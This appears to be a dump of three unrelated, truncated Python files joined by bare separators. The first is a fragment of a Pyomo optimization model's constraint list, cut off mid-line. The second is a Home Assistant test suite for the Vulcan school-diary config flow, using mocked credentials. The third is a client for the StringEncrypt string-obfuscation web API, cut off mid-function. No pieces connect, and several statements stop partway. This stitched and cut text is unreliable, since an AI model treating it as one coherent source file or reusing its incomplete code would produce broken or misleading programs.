m.c905 = Constraint(expr= m.x785 + 13.5*m.b992 <= 13.5)
m.c906 = Constraint(expr= m.x786 + 13.5*m.b993 <= 13.5)
m.c907 = Constraint(expr= m.x787 + 13.5*m.b994 <= 13.5)
m.c908 = Constraint(expr= - 0.6*m.x740 + m.x788 == 0)
m.c909 = Constraint(expr= - 0.6*m.x741 + m.x789 == 0)
m.c910 = Constraint(expr= - 0.6*m.x742 + m.x790 == 0)
m.c911 = Constraint(expr= m.x743 == 0)
m.c912 = Constraint(expr= m.x744 == 0)
m.c913 = Constraint(expr= m.x745 == 0)
m.c914 = Constraint(expr= m.x791 == 0)
m.c915 = Constraint(expr= m.x792 == 0)
m.c916 = Constraint(expr= m.x793 == 0)
m.c917 = Constraint(expr= m.x311 - m.x740 - m.x743 == 0)
m.c918 = Constraint(expr= m.x312 - m.x741 - m.x744 == 0)
m.c919 = Constraint(expr= m.x313 - m.x742 - m.x745 == 0)
m.c920 = Constraint(expr= m.x329 - m.x788 - m.x791 == 0)
m.c921 = Constraint(expr= m.x330 - m.x789 - m.x792 == 0)
m.c922 = Constraint(expr= m.x331 - m.x790 - m.x793 == 0)
m.c923 = Constraint(expr= m.x740 - 15*m.b995 <= 0)
m.c924 = Constraint(expr= m.x741 - 15*m.b996 <= 0)
m.c925 = Constraint(expr= m.x742 - 15*m.b997 <= 0)
m.c926 = Constraint(expr= m.x743 + 15*m.b995 <= 15)
m.c927 = Constraint(expr= m.x744 + 15*m.b996 <= 15)
m.c928 = Constraint(expr= m.x745 + 15*m.b997 <= 15)
m.c929 = Constraint(expr= m.x788 - 9*m.b995 <= 0)
m.c930 = Constraint(expr= m.x789 - 9*m.b996 <= 0)
m.c931 = Constraint(expr= m.x790 - 9*m.b997 <= 0)
m.c932 = Constraint(expr= m.x791 + 9*m.b995 <= 9)
m.c933 = Constraint(expr= m.x792 + 9*m.b996 <= 9)
m.c934 = Constraint(expr= m.x793 + 9*m.b997 <= 9)
m.c935 = Constraint(expr=(m.x794/(1e-6 + m.b998) - 1.1*log(1 + m.x746/(1e-6 + m.b998)))*(1e-6 + m.b998) <= 0)
m.c936 = Constraint(expr=(m.x795/(1e-6 + m.b999) - 1.1*log(1 + m.x747/(1e-6 + m.b999)))*(1e-6 + m.b999) <= 0)
m.c937 = Constraint(expr=(m.x796/(1e-6 + m.b1000) - 1.1*log(1 + m.x748/(1e-6 + m.b1000)))*(1e-6 + m.b1000) <= 0)
m.c938 = Constraint(expr= m.x749 == 0)
m.c939 = Constraint(expr= m.x750 == 0)
m.c940 = Constraint(expr= m.x751 == 0)
m.c941 = Constraint(expr= m.x797 == 0)
m.c942 = Constraint(expr= m.x798 == 0)
m.c943 = Constraint(expr= m.x799 == 0)
m.c944 = Constraint(expr= m.x314 - m.x746 - m.x749 == 0)
m.c945 = Constraint(expr= m.x315 - m.x747 - m.x750 == 0)
m.c946 = Constraint(expr= m.x316 - m.x748 - m.x751 == 0)
m.c947 = Constraint(expr= m.x332 - m.x794 - m.x797 == 0)
m.c948 = Constraint(expr= m.x333 - m.x795 - m.x798 == 0)
m.c949 = Constraint(expr= m.x334 - m.x796 - m.x799 == 0)
m.c950 = Constraint(expr= m.x746 - 15*m.b998 <= 0)
m.c951 = Constraint(expr= m.x747 - 15*m.b999 <= 0)
m.c952 = Constraint(expr= m.x748 - 15*m.b1000 <= 0)
m.c953 = Constraint(expr= m.x749 + 15*m.b998 <= 15)
m.c954 = Constraint(expr= m.x750 + 15*m.b999 <= 15)
m.c955 = Constraint(expr= m.x751 + 15*m.b1000 <= 15)
m.c956 = Constraint(expr= m.x794 - 3.04984759446376*m.b998 <= 0)
m.c957 = Constraint(expr= m.x795 - 3.04984759446376*m.b999 <= 0)
m.c958 = Constraint(expr= m.x796 - 3.04984759446376*m.b1000 <= 0)
m.c959 = Constraint(expr= m.x797 + 3.04984759446376*m.b998 <= 3.04984759446376)
m.c960 = Constraint(expr= m.x798 + 3.04984759446376*m.b999 <= 3.04984759446376)
m.c961 = Constraint(expr= m.x799 + 3.04984759446376*m.b1000 <= 3.04984759446376)
m.c962 = Constraint(expr= - 0.9*m.x755 + m.x854 == 0)
m.c963 = Constraint(expr= - 0.9*m.x756 + m.x855 == 0)
m.c964 = Constraint(expr= - 0.9*m.x757 + m.x856 == 0)
m.c965 = Constraint(expr= - m.x812 + m.x854 == 0)
m.c966 = Constraint(expr= - m.x813 + m.x855 == 0)
m.c967 = Constraint(expr= - m.x814 + m.x856 == 0)
m.c968 = Constraint(expr= m.x761 == 0)
m.c969 = Constraint(expr= m.x762 == 0)
m.c970 = Constraint(expr= m.x763 == 0)
m.c971 = Constraint(expr= m.x815 == 0)
m.c972 = Constraint(expr= m.x816 == 0)
m.c973 = Constraint(expr= m.x817 == 0)
m.c974 = Constraint(expr= m.x857 == 0)
m.c975 = Constraint(expr= m.x858 == 0)
m.c976 | |
"""Test the Uonet+ Vulcan config flow."""
import json
from unittest import mock
from unittest.mock import patch
from vulcan import Account
from vulcan.model import Student
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.vulcan import config_flow, const, register
from homeassistant.components.vulcan.config_flow import (
ClientConnectionError,
Keystore,
VulcanAPIException,
)
from homeassistant.const import CONF_PIN, CONF_REGION, CONF_SCAN_INTERVAL, CONF_TOKEN
from tests.common import MockConfigEntry, load_fixture
fake_keystore = Keystore("", "", "", "", "")
fake_account = Account(
login_id=1,
user_login="<EMAIL>",
user_name="<EMAIL>",
rest_url="rest_url",
)
async def test_show_form(hass):
"""Test that the form is served with no input."""
flow = config_flow.VulcanFlowHandler()
flow.hass = hass
result = await flow.async_step_user(user_input=None)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
async def test_config_flow_auth_success(
mock_keystore, mock_account, mock_student, hass
):
"""Test a successful config flow initialized by the user."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
async def test_config_flow_auth_success_with_multiple_students(
mock_keystore, mock_account, mock_student, hass
):
"""Test a successful config flow with multiple students."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(student)
for student in [load_fixture("fake_student_1.json", "vulcan")]
+ [load_fixture("fake_student_2.json", "vulcan")]
]
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_student"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"student": "0"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
async def test_config_flow_reauth_success(
mock_account, mock_keystore, mock_student, hass
):
"""Test a successful config flow reauth."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="0",
data={"student_id": "0", "login": "<EMAIL>"},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_REAUTH}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
async def test_config_flow_reauth_with_errors(mock_account, mock_keystore, hass):
"""Test reauth config flow with errors."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_REAUTH}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Invalid token."),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "invalid_token"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Expired token."),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "expired_token"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Invalid PIN."),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "invalid_pin"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=VulcanAPIException("Unknown error"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "unknown"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=RuntimeError("Internal Server Error (ArgumentException)"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "invalid_symbol"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=RuntimeError("Unknown error"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "unknown"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=ClientConnectionError,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "cannot_connect"}
with patch(
"homeassistant.components.vulcan.config_flow.Account.register",
side_effect=Exception,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth"
assert result["errors"] == {"base": "unknown"}
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
@mock.patch("homeassistant.components.vulcan.config_flow.Keystore.create")
@mock.patch("homeassistant.components.vulcan.config_flow.Account.register")
async def test_multiple_config_entries(mock_account, mock_keystore, mock_student, hass):
"""Test a successful config flow for multiple config entries."""
mock_keystore.return_value = fake_keystore
mock_account.return_value = fake_account
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
await register.register(hass, "token", "region", "000000")
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": False},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{CONF_TOKEN: "token", CONF_REGION: "region", CONF_PIN: "000000"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials_2(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials (different situation)."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
] + [Student.load(load_fixture("fake_student_2.json", "vulcan"))]
MockConfigEntry(
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_student"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"student": "0"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials_3(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
]
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
@mock.patch("homeassistant.components.vulcan.config_flow.Vulcan.get_students")
async def test_multiple_config_entries_using_saved_credentials_4(mock_student, hass):
"""Test a successful config flow for multiple config entries using saved credentials (different situation)."""
mock_student.return_value = [
Student.load(load_fixture("fake_student_1.json", "vulcan"))
] + [Student.load(load_fixture("fake_student_2.json", "vulcan"))]
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_student"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"student": "0"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<NAME>"
async def test_multiple_config_entries_without_valid_saved_credentials(hass):
"""Test a unsuccessful config flow for multiple config entries without valid saved credentials."""
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
with patch(
"homeassistant.components.vulcan.config_flow.Vulcan.get_students",
side_effect=VulcanAPIException("The certificate is not authorized."),
):
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "auth"
assert result["errors"] == {"base": "expired_credentials"}
async def test_multiple_config_entries_using_saved_credentials_with_connections_issues(
hass,
):
"""Test a unsuccessful config flow for multiple config entries without valid saved credentials."""
MockConfigEntry(
entry_id="456",
domain=const.DOMAIN,
unique_id="234567",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan"))
| {"student_id": "456"},
).add_to_hass(hass)
MockConfigEntry(
entry_id="123",
domain=const.DOMAIN,
unique_id="123456",
data=json.loads(load_fixture("fake_config_entry_data.json", "vulcan")),
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
const.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "add_next_config_entry"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"use_saved_credentials": True},
)
with patch(
"homeassistant.components.vulcan.config_flow.Vulcan.get_students",
side_effect=ClientConnectionError,
):
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"credentials": "123"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "select_saved_credentials"
assert result["errors"] == {"base": "cannot_connect"}
async def test_multiple_config_entries_using_saved_credentials_with_unknown_error(hass):
"""Test a unsuccessful config flow for multiple config entries without valid saved credentials."""
MockConfigEntry(
entry_id="456",
| |
<filename>stringencrypt/stringencrypt.py
#!/usr/bin/env python
###############################################################################
#
# String Encryption and File Encryption for programmers & developers
#
# String Encrypt can help you hide the things that shouldn't be visible at
# first glance in your source code to anyone with a hex-editor.
#
# Supported programming languages code generation:
#
# * C/C++ - https://www.stringencrypt.com/c-cpp-encryption/
# * C# - https://www.stringencrypt.com/c-sharp-encryption/
# * Visual Basic .NET - https://www.stringencrypt.com/visual-basic-net-vb-net-encryption/
# * Delphi/Pascal - https://www.stringencrypt.com/delphi-pascal-encryption/
# * Java - https://www.stringencrypt.com/java-encryption/
# * JavaScript - https://www.stringencrypt.com/javascript-encryption/
# * Python - https://www.stringencrypt.com/python-encryption/
# * Ruby - https://www.stringencrypt.com/ruby-encryption/
# * AutoIt - https://www.stringencrypt.com/autoit-encryption/
# * PowerShell - https://www.stringencrypt.com/powershell-encryption/
# * Haskell - https://www.stringencrypt.com/haskell-encryption/
# * MASM - https://www.stringencrypt.com/masm-encryption/
# * FASM - https://www.stringencrypt.com/fasm-encryption/
#
# Version : StringEncrypt v1.0
# Python : Python v3
# Dependencies : requests (https://pypi.python.org/pypi/requests/)
# Author : <NAME> (<EMAIL>)
# Project page : https://www.stringencrypt.com
# Web page : https://www.pelock.com
#
###############################################################################
import zlib
import base64
from enum import *
# required external package - install with "pip install requests"
import requests
class StringEncrypt(object):
"""StringEncrypt Python 3 module"""
#
# @var string default StringEncrypt WebApi endpoint
#
API_URL = "https://www.stringencrypt.com/api.php"
#
# @var string WebApi key for the service
#
_activationCode = ""
#
# @var bool input string / raw bytes compression enabled (enabled by default)
#
# if you set it to true, you need to compress input string / raw bytes eg.
#
# compressed = @base64_encode(@gzcompress(string, 9)
#
# and after encryption you need to decompress encrypted data
#
# decompressed = @gzuncompress(@base64_decode(source));
#
# options["compression"] = true/false
enableCompression = True
#
# @var bool treat input string as a UNICODE string (ANSI otherwise)
#
# options["unicode"] = true/false
useUnicode = True
class LangLocaleEncodings(Enum):
"""Input string default locale (only those listed below are supported currently)"""
def __str__(self):
return self.value
LANG_US = "en_US.utf8"
LANG_GB = "en_GB.utf8"
LANG_DE = "de_DE.utf8"
LANG_ES = "es_ES.utf8"
LANG_BE = "fr_BE.utf8"
LANG_FR = "fr_FR.utf8"
LANG_PL = "pl_PL.utf8"
#
# @var string input string locate for UTF-8 encoded strings (en_US encoding is used by default )
#
langLocaleEncoding = LangLocaleEncodings.LANG_US
class NewLinesEncodings(Enum):
"""How to encode new lines, available values:
"lf" - Unix style
"crlf" - Windows style
"cr" - Mac style"""
def __str__(self):
return self.value
UNIX_STYLE_LF = "lf"
WINDOWS_STYLE_CRLF = "crlf"
MAC_STYLE_CR = "cr"
#
# @var string How to encode new lines (Unix LF is used by default)
#
newLinesEncoding = NewLinesEncodings.UNIX_STYLE_LF
class AnsiEncodings(Enum):
"""Destination ANSI string encoding (if UNICODE encoding is disabled)
only those listed below are supported"""
def __str__(self):
return self.value
WINDOWS_1250 = "WINDOWS-1250"
WINDOWS_1251 = "WINDOWS-1251"
WINDOWS_1252 = "WINDOWS-1252"
WINDOWS_1253 = "WINDOWS-1253"
WINDOWS_1254 = "WINDOWS-1254"
WINDOWS_1255 = "WINDOWS-1255"
WINDOWS_1256 = "WINDOWS-1256"
WINDOWS_1257 = "WINDOWS-1257"
WINDOWS_1258 = "WINDOWS-1258"
ISO_8859_1 = "ISO-8859-1"
ISO_8859_2 = "ISO-8859-2"
ISO_8859_3 = "ISO-8859-3"
ISO_8859_9 = "ISO-8859-9"
ISO_8859_10 = "ISO-8859-10"
ISO_8859_14 = "ISO-8859-14"
ISO_8859_15 = "ISO-8859-15"
ISO_8859_16 = "ISO-8859-16"
#
# @var string ANSI encoding if UNICODE mode is disabled (WINDOWS-1250 encoding is used by default)
#
ansiEncoding = AnsiEncodings.WINDOWS_1250
class OutputProgrammingLanguages(Enum):
"""Output programming language.
Only those listed below are supported, if you pass
other name, service will return ERROR_INVALID_LANG"""
def __str__(self):
return self.value
LANG_CPP = "cpp"
LANG_CSHARP = "csharp"
LANG_VBNET = "vbnet"
LANG_DELPHI = "delphi"
LANG_JAVA = "java"
LANG_JS = "js"
LANG_PYTHON = "python"
LANG_RUBY = "ruby"
LANG_AUTOIT = "autoit"
LANG_POWERSHELL = "powershell"
LANG_HASKELL = "haskell"
LANG_MASM = "masm"
LANG_FASM = "fasm"
#
# @var string Generate output source code in selected programming language (Python is selected by default)
#
outputProgrammingLanguage = OutputProgrammingLanguages.LANG_PYTHON
#
# @var integer minimum number of encryption commands
#
# Demo mode supports only up to 3 commands (50 in full version),
# if you pass more than this number, service will return
# ERROR_CMD_MIN
#
# options["cmd_min"] = 1
minEncryptionCommands = 1
#
# @var integer maximum number of encryption commands
#
# demo mode supports only up to 3 commands (50 in full version),
# if you pass more than this number, service will return
# ERROR_CMD_MAX
#
# options["cmd_max"] = 50
maxEncryptionCommands = 3
#
# @var bool store encrypted string as a local variable (if supported
# by the programming language), otherwise it's stored as
# a global variable
#
# options["local"] = true/false
declareAsLocalVariable = False
class ErrorCodes(IntEnum):
"""Possible error codes returned by the StringEncrypt WebAPI service"""
# @var integer success
ERROR_SUCCESS = 0
# @var integer label parameter is missing
ERROR_EMPTY_LABEL = 1
# @var integer label length is too long
ERROR_LENGTH_LABEL = 2
# @var integer input string is missing
ERROR_EMPTY_STRING = 3
# @var integer input file is missing
ERROR_EMPTY_BYTES = 4
# @var integer input string/file is missing
ERROR_EMPTY_INPUT = 5
# @var integer string length is too long
ERROR_LENGTH_STRING = 6
# @var integer bytes length is too long
ERROR_LENGTH_BYTES = 11
# @var integer programming language not supported
ERROR_INVALID_LANG = 7
# @var integer invalid locale defined
ERROR_INVALID_LOCALE = 8
# @var integer min. number of encryption commands error
ERROR_CMD_MIN = 9
# @var integer max. number of encryption commands error
ERROR_CMD_MAX = 10
# @var integer you need a valid code to use full version features
ERROR_DEMO = 100
def __init__(self, activation_code=None):
"""Initialize StringEncrypt class
:param api_key: Activation code for the service (it can be empty for demo mode)
"""
self._activationCode = activation_code
def is_demo(self):
"""Login to the service using previously provided activation code and get the
information about the current license limits
:return: An array with the results or False on error
:rtype: bool,dict
"""
# parameters
params = {"command": "is_demo"}
return self.post_request(params)
def encrypt_file_contents(self, file_path, label):
"""Encrypt binary file contents
:param file_path: A path to any binary file. Demo mode doesn't support
this parameter and the service will return ERROR_DEMO
:param label: A label name. Demo mode supports up to 10 chars only
(64 in full version), if you pass more than this number, service
will return ERROR_LENGTH_LABEL
:return: An array with the results or False on error
:rtype: bool,dict
"""
source_file = open(file_path, 'rb')
bytes = source_file.read()
source_file.close()
if not bytes:
return False
# additional parameters
params_array = {"command": "encrypt", "bytes": bytes, "label": label}
return self.post_request(params_array)
def encrypt_string(self, string, label):
"""Encrypt a string into an encrypted source code in selected programming language
:param string: An input string in UTF-8 or ANSI format (by default UTF-8 is used)
demo mode supports up to 10 chars only, if you pass more
than that, service will return ERROR_LENGTH_STRING
:param label: label name. Demo mode supports up to 10 chars only
(64 in full version), if you pass more than this number, service
will return ERROR_LENGTH_LABEL
:return: An array with the results or False on error
:rtype: bool,dict
"""
# additional parameters
params_array = {"command": "encrypt", "string": string, "label": label}
return self.post_request(params_array)
def post_request(self, params_array):
"""Send a POST request to the server
:param params_array: An array with the parameters
:return: An array with the results or false on error
:rtype: bool,dict
"""
# add activation code to the parameters array
params_array["code"] = self._activationCode
# setup parameters for the "encrypt" command ("is_demo" doesn't require it)
if params_array["command"] == "encrypt":
params_array["unicode"] = 1 if self.useUnicode else 0
params_array["lang_locale"] = self.langLocaleEncoding
params_array["ansi_encoding"] = self.ansiEncoding
params_array["local"] = 1 if self.declareAsLocalVariable else 0
params_array["new_lines"] = self.newLinesEncoding
# number of encryption commands
params_array["cmd_min"] = self.minEncryptionCommands
params_array["cmd_max"] = self.maxEncryptionCommands
params_array["lang"] = self.outputProgrammingLanguage
#
# check if compression is enabled
#
if self.enableCompression:
params_array["compression"] = "1"
if "string" in params_array and params_array["string"]:
compressed_data = zlib.compress(bytes(params_array["string"], 'utf-8'), 9)
base64_encoded_data = base64.b64encode(compressed_data).decode()
params_array["string"] = base64_encoded_data
elif "bytes" in params_array and params_array["bytes"]:
compressed_data = zlib.compress(bytes(params_array["bytes"]), 9)
base64_encoded_data = base64.b64encode(compressed_data).decode()
params_array["bytes"] = base64_encoded_data
response = requests.post(self.API_URL, data=params_array)
# no response at all or an invalid response code
if not response or not response.ok:
return False
# decode to json array
result = response.json()
# depack output code back into the string
if "source" in result and self.enableCompression and result["error"] == self.ErrorCodes.ERROR_SUCCESS:
